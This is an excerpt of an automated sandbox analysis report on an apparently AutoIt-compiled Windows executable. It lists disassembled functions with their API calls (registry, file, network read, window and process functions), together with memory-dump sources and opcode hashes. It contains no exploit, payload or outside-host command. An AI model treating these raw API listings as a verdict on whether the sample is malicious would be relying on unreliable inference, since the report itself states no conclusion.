LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BF3CDE,?,00C81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BB4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BB4E74
FreeLibrary.KERNEL32(00000000,?,?,00BF3CDE,?,00C81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BB4E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 00BB4E6E
kernel32.dll, xrefs: 00BB4E5B

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: ddf22df2ee8e06db9afce101920e682fb4bea986d09e662c9ea71f9f31f30f8f
Instruction ID: 898e7672a6b94149fdccd51922d24b4501f6778334dcce6a1be80e4cdf5c8f37
Opcode Fuzzy Hash: ddf22df2ee8e06db9afce101920e682fb4bea986d09e662c9ea71f9f31f30f8f
Instruction Fuzzy Hash: F4D0C23A503A215746621B246C08FDF2B58FF82B113050160B804A2121CFA0CD02C5E0

Function 00C3A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00C3A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C3A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C3A468
CloseHandle.KERNEL32(?), ref: 00C3A63D

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 1518d653dfc1f6745b5acdc1c59553c3a52f9d87f57433e3e47483b884cc7d37
Instruction ID: 7e6d032ca6c710207be86cce3c37506042d461eba041767e712071d0ac7bb7b7
Opcode Fuzzy Hash: 1518d653dfc1f6745b5acdc1c59553c3a52f9d87f57433e3e47483b884cc7d37
Instruction Fuzzy Hash: 02A190716147009FD720DF24C886F2AB7E5AF84714F14889DF5AA9B392DBB0ED41CB92

Function 00BEBB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C53700), ref: 00BEBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,00C8121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00BEBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00C81270,000000FF,?,0000003F,00000000,?), ref: 00BEBC36
_free.LIBCMT ref: 00BEBB7F

Part of subcall function 00BE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BED7D1,00000000,00000000,00000000,00000000,?,00BED7F8,00000000,00000007,00000000,?,00BEDBF5,00000000), ref: 00BE29DE
Part of subcall function 00BE29C8: GetLastError.KERNEL32(00000000,?,00BED7D1,00000000,00000000,00000000,00000000,?,00BED7F8,00000000,00000007,00000000,?,00BEDBF5,00000000,00000000), ref: 00BE29F0

_free.LIBCMT ref: 00BEBD4B

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 1b8b826db0579aa2bde00c78d72baaed2a88e3920b7bb68c6f885a4bcb69ff9b
Instruction ID: c9a3eee5d2271a2edb2d09e2541eaa0a0b3b5548760004589bb58cb26164f050
Opcode Fuzzy Hash: 1b8b826db0579aa2bde00c78d72baaed2a88e3920b7bb68c6f885a4bcb69ff9b
Instruction Fuzzy Hash: 9351F771904249AFCB14EF669C81EAFB7FCEF40320B1442EAE554D72A1EB309E418B54

Function 00C1E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C1DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C1CF22,?), ref: 00C1DDFD

Part of subcall function 00C1DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C1CF22,?), ref: 00C1DE16

Part of subcall function 00C1E199: GetFileAttributesW.KERNEL32(?,00C1CF95), ref: 00C1E19A

lstrcmpiW.KERNEL32(?,?), ref: 00C1E473
MoveFileW.KERNEL32(?,?), ref: 00C1E4AC
_wcslen.LIBCMT ref: 00C1E5EB
_wcslen.LIBCMT ref: 00C1E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00C1E650

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: f9b50575625b2256415a5d1d7f49bacb882cfe4278022666bf54832ed1cd1ef9
Instruction ID: 072228316284d73a343975e6ef9345e46b2201140275d5a7f20d64840eb88fef
Opcode Fuzzy Hash: f9b50575625b2256415a5d1d7f49bacb882cfe4278022666bf54832ed1cd1ef9
Instruction Fuzzy Hash: BB5172B24083459BC724EB90DC819DFB3ECAF85340F10491EFA99D3191EF74A6C89766

Function 00C3B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB9CB3: _wcslen.LIBCMT ref: 00BB9CBD

Part of subcall function 00C3C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3B6AE,?,?), ref: 00C3C9B5
Part of subcall function 00C3C998: _wcslen.LIBCMT ref: 00C3C9F1
Part of subcall function 00C3C998: _wcslen.LIBCMT ref: 00C3CA68
Part of subcall function 00C3C998: _wcslen.LIBCMT ref: 00C3CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C3BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C3BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C3BB63
RegCloseKey.ADVAPI32(?,?), ref: 00C3BBA6
RegCloseKey.ADVAPI32(00000000), ref: 00C3BBB3

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: adb506376acc144d6c744382a0954552917174a89b8ba9f92b411567ea8fdd42
Instruction ID: bd4e3fbeaba801c94869ee186d1a6f358a6b05a30935f99fa2fa8682e68faefd
Opcode Fuzzy Hash: adb506376acc144d6c744382a0954552917174a89b8ba9f92b411567ea8fdd42
Instruction Fuzzy Hash: 9761A031218241AFD314DF14C8D1E6ABBE5FF84308F14859DF59A8B2A2DB31ED45DB92

Function 00C18BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C18BCD
VariantClear.OLEAUT32 ref: 00C18C3E
VariantClear.OLEAUT32 ref: 00C18C9D
VariantClear.OLEAUT32(?), ref: 00C18D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C18D3B

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: e59bf211b3da27f7e66501f180bbdb9046c18bcb83f033ae086e2027956a8c97
Instruction ID: 47bfb1b0a5641b8bae085cc33b3379fd0f1c5a8a848dd69e30d459251cc9bb6d
Opcode Fuzzy Hash: e59bf211b3da27f7e66501f180bbdb9046c18bcb83f033ae086e2027956a8c97
Instruction Fuzzy Hash: 635169B5A0021AEFCB10DF68D894AAAB7F8FF8A310B158559F915DB350E730E951CF90

Function 00C28AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C28BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00C28BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C28C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C28C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C28C5F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 9547991b56c32646ed84c9c638bb36db21be92f5033dc2f49798f6634e6191ec
Instruction ID: df2db722d2d262da5713098a544d2988891681905175e8441f7d9459cabb2a88
Opcode Fuzzy Hash: 9547991b56c32646ed84c9c638bb36db21be92f5033dc2f49798f6634e6191ec
Instruction Fuzzy Hash: FA516B35A002159FCB11DF64C881EADBBF5FF49314F088098E849AB362CB71ED45CBA0

Function 00C38EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00C38F40
GetProcAddress.KERNEL32(00000000,?), ref: 00C38FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00C38FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00C39032
FreeLibrary.KERNEL32(00000000), ref: 00C39052

Part of subcall function 00BCF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00C21043,?,75C0E610), ref: 00BCF6E6
Part of subcall function 00BCF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00C0FA64,00000000,00000000,?,?,00C21043,?,75C0E610,?,00C0FA64), ref: 00BCF70D

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 143ec90e8d4d364eaff7cd4e35ba9b76d58472f5e6b0ba318515786ace15fdc9
Instruction ID: 82f8e84dcfe66a9ddd03660dcb609cfbf49d202f6e2340436bf1ccb9cca9bb20
Opcode Fuzzy Hash: 143ec90e8d4d364eaff7cd4e35ba9b76d58472f5e6b0ba318515786ace15fdc9
Instruction Fuzzy Hash: 1F514835615205DFCB14DF68C4949ADBBF1FF49314F0480A8E81A9B362DB71EE85CB90

Function 00C46B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00C46C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00C46C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00C46C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00C2AB79,00000000,00000000), ref: 00C46C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00C46CC7

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 277b2a3ed0441b5adea94ebd05b3273d402cde0ce84784011c2d0e7a8920d98f
Instruction ID: 94fa45b8b0d7618e654f7a4dfcf92baf7866b193039aa11bcbddbc42a12e00a6
Opcode Fuzzy Hash: 277b2a3ed0441b5adea94ebd05b3273d402cde0ce84784011c2d0e7a8920d98f
Instruction Fuzzy Hash: 0E41B235A04104AFDB24CF69CCD8FA97BA5FB0B360F150268FCA5A72E4C771AE41DA51

Function 00BE2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BE20C3
_free.LIBCMT ref: 00BE20E3

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 3b43a442a61eda07880525ee95aaa4eb1b480a0d3ca65ed4f39912933f15101d
Instruction ID: 0dfeda684c52cb24c49d6a4744b127c1a890d48f512158c37d11036d3bbc5e46
Opcode Fuzzy Hash: 3b43a442a61eda07880525ee95aaa4eb1b480a0d3ca65ed4f39912933f15101d
Instruction Fuzzy Hash: 9E41D332A002449FDB24DF79C881A5DB7F9EF89314F1545E9E516EB392D731AE01CB81

Function 00C23874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00C238CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C23922
TranslateMessage.USER32(?), ref: 00C2394B
DispatchMessageW.USER32(?), ref: 00C23955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C23966

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 4c9ab98c9103b20adaee5513a7b229288c352e64b90de2745269e976020ff872
Instruction ID: b56172e1759c1459367039b8377e6186698e5e9b216868d0be98ba5faed780e6
Opcode Fuzzy Hash: 4c9ab98c9103b20adaee5513a7b229288c352e64b90de2745269e976020ff872
Instruction Fuzzy Hash: B331C8705043D19EEB25DB35A849BBA37E8AB06314F08056DE872C69E0D3B89BC5DB15

Function 00C2CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00C2C21E,00000000), ref: 00C2CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 00C2CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,00C2C21E,00000000), ref: 00C2CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,00C2C21E,00000000), ref: 00C2CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,00C2C21E,00000000), ref: 00C2CFF2

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 9f07bbdfeed92c9858f95407a654545c650e501511ad308904f3fc63a071ec4e
Instruction ID: da799fdc397e7ba9c304382b74243e4b60f6b7e8cd5be3788c666e600bb6d390
Opcode Fuzzy Hash: 9f07bbdfeed92c9858f95407a654545c650e501511ad308904f3fc63a071ec4e
Instruction Fuzzy Hash: 21314C71500615EFDB20DFE5E9C4AAFBBF9FB15350B10446EF526D2550DB30AE409B60

Function 00C11901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C11915
PostMessageW.USER32(00000001,00000201,00000001), ref: 00C119C1
Sleep.KERNEL32(00000000,?,?,?), ref: 00C119C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 00C119DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00C119E2

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 7c3d37044747e121fe4bb441dddd890d2b57426b760aebb463c29f9b199d27d3
Instruction ID: 19bfe03ff7132998264c233a4fc2c6380621288228e2b454861321dedde86b7a
Opcode Fuzzy Hash: 7c3d37044747e121fe4bb441dddd890d2b57426b760aebb463c29f9b199d27d3
Instruction Fuzzy Hash: FC319E75900219EFCB00CFA8C999BDE3BB5EB06315F148225FE31A72D1C7749A94DB90

Function 00C45706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C45745
SendMessageW.USER32(?,00001074,?,00000001), ref: 00C4579D
_wcslen.LIBCMT ref: 00C457AF
_wcslen.LIBCMT ref: 00C457BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C45816

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: bca17691b914d964afd480744917658dcfb351566e3fd44a479bbd50bf27d4e1
Instruction ID: b317178427f3f11d71ce341f984e61578bc7ed076dfc031f2f4120502f022f91
Opcode Fuzzy Hash: bca17691b914d964afd480744917658dcfb351566e3fd44a479bbd50bf27d4e1
Instruction Fuzzy Hash: 5B21B675904618DBDB209F61CC85AEDB7B8FF15324F108266F929EB1C1D7708A85CF50

Function 00C30930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00C30951
GetForegroundWindow.USER32 ref: 00C30968
GetDC.USER32(00000000), ref: 00C309A4
GetPixel.GDI32(00000000,?,00000003), ref: 00C309B0
ReleaseDC.USER32(00000000,00000003), ref: 00C309E8

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 5a49fe0ea99cff5dbbbad3aa69515460c93404e713d6ae91185915f32e683e6d
Instruction ID: 5e7a2267303650296533b0117c240645e4d66011189d1deaa64e6ae082b7442d
Opcode Fuzzy Hash: 5a49fe0ea99cff5dbbbad3aa69515460c93404e713d6ae91185915f32e683e6d
Instruction Fuzzy Hash: DC219F3A600214AFD714EF65D898BAEBBE9FF45710F148068F84A97762CB70AD04CB50

Function 00BECDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00BECDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BECDE9

Part of subcall function 00BE3820: RtlAllocateHeap.NTDLL(00000000,?,00C81444,?,00BCFDF5,?,?,00BBA976,00000010,00C81440,00BB13FC,?,00BB13C6,?,00BB1129), ref: 00BE3852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BECE0F
_free.LIBCMT ref: 00BECE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BECE31

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: c54a5586564d86d57004592e42b03388baff5a7b7b5f7a520f4c9333bfc8eb38
Instruction ID: 1ef69bf7a2f434a0a04d6cee33df0833d1f3e3b851f1ffb72a381c7fc196f7a7
Opcode Fuzzy Hash: c54a5586564d86d57004592e42b03388baff5a7b7b5f7a520f4c9333bfc8eb38
